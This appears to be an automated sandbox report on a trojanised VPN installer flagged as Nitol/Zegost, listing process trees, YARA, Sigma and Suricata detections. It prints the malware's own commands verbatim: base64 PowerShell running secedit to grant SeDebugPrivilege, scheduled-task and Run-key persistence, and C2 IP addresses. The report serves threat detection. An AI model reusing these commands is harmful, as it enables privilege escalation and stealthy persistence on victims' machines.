cmd.exe (PID: 7748 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7808 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 3160 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7336 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 1584 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2444 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 4552 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2032 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7368 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 420 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7684 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 352 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 3052 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3508 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6804 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6600 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 3204 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1096 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6732 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2096 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 8020 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5560 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 8056 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1932 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6448 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1456 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 3916 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7508 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5688 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5828 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6640 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5308 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2760 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6304 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

svchost.exe (PID: 6888 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Microsoft\Program\ziliao.jpg	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
C:\ProgramData\Microsoft\Program\ziliao.jpg	JoeSecurity_Nitol	Yara detected Nitol	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000021.00000002.4652369684.0000000004EC0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000002.00000003.2119448710.0000000004BE6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000021.00000002.4652621653.0000000006315000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000021.00000002.4652621653.0000000006315000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: irsetup.exe PID: 6980	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: powershell.exe PID: 2536	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x74afa:$b1: ::WriteAllBytes( 0x8d22c:$b1: ::WriteAllBytes( 0x8dda9:$b1: ::WriteAllBytes( 0x8e0b3:$b1: ::WriteAllBytes( 0x8f464:$b1: ::WriteAllBytes( 0xa859f:$b1: ::WriteAllBytes( 0xac9cf:$b1: ::WriteAllBytes( 0xb228c:$b1: ::WriteAllBytes( 0xb2591:$b1: ::WriteAllBytes( 0xb620f:$b1: ::WriteAllBytes( 0x130ba5:$b1: ::WriteAllBytes( 0x130eaa:$b1: ::WriteAllBytes( 0x163f9f:$b1: ::WriteAllBytes( 0x1642a4:$b1: ::WriteAllBytes( 0x165319:$b1: ::WriteAllBytes( 0x16cc49:$b1: ::WriteAllBytes( 0x16cf51:$b1: ::WriteAllBytes( 0x16d43f:$b1: ::WriteAllBytes( 0x16d943:$b1: ::WriteAllBytes( 0x16dc38:$b1: ::WriteAllBytes( 0x177d6b:$b1: ::WriteAllBytes(
Process Memory Space: iusb3mon.exe PID: 4196	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
33.2.iusb3mon.exe.6cf0000.4.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
33.2.iusb3mon.exe.6cf0000.4.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
33.2.iusb3mon.exe.4ec05bf.2.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
33.2.iusb3mon.exe.4ec05bf.2.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
33.2.iusb3mon.exe.4ec05bf.2.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
33.2.iusb3mon.exe.4ec05bf.2.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
33.2.iusb3mon.exe.6cf0000.4.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
33.2.iusb3mon.exe.6cf0000.4.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
2.3.irsetup.exe.4be65ff.0.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
2.3.irsetup.exe.4be65ff.0.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
33.2.iusb3mon.exe.631b567.3.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
33.2.iusb3mon.exe.631b567.3.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
33.2.iusb3mon.exe.631b567.3.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
33.2.iusb3mon.exe.631b567.3.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe" , ParentImage: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe, ParentProcessId: 5920, ParentProcessName: 5ar6QsR4e.exe, ProcessCommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", ProcessId: 2536, ProcessName: powershell.exe

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe" , CommandLine: "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe, NewProcessName: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe, OriginalFileName: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3204, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe" , ProcessId: 5920, ProcessName: 5ar6QsR4e.exe

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe" , ParentImage: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe, ParentProcessId: 5920, ParentProcessName: 5ar6QsR4e.exe, ProcessCommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", ProcessId: 1584, ProcessName: powershell.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 143.92.60.116, DestinationIsIpv6: false, DestinationPort: 25445, EventID: 3, Image: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe, Initiated: true, ProcessId: 5920, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49771

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Program\iusb3mon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe, ProcessId: 5920, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine|base64offset|contains: ~>z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5904754 "__IRAFN:C:\Users\user\Desktop\KL-3.1.16.exe" "__IRCT:3" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003", ParentImage: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe, ParentProcessId: 6980, ParentProcessName: irsetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, ProcessId: 2356, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6888, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T16:07:19.597484+0100	2022482	1	A Network Trojan was detected	192.168.2.6	49735	104.21.81.224	80	TCP
2024-12-29T16:07:21.893979+0100	2022482	1	A Network Trojan was detected	192.168.2.6	49744	104.21.81.224	443	TCP
2024-12-29T16:07:22.251740+0100	2022482	1	A Network Trojan was detected	192.168.2.6	49735	104.21.81.224	80	TCP
2024-12-29T16:07:24.887196+0100	2022482	1	A Network Trojan was detected	192.168.2.6	49750	104.21.81.224	443	TCP

ET MALWARE JS/Nemucod.M.gen downloading EXE payload

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T16:07:25.170988+0100	2021954	1	A Network Trojan was detected	104.21.81.224	443	192.168.2.6	49750	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2
Source: C:\ProgramData\Program\iusb3mon.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2

Multi AV Scanner detection for submitted file

Source: KL-3.1.16.exe

Virustotal: Detection: 12%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Documents\B8_2rBP8O\5ar6QsR4e.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Program\iusb3mon.exe	Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\letsvpn-latest.exe			Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.81.224:443 -> 192.168.2.6:49744 version: TLS 1.2

Source: KL-3.1.16.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

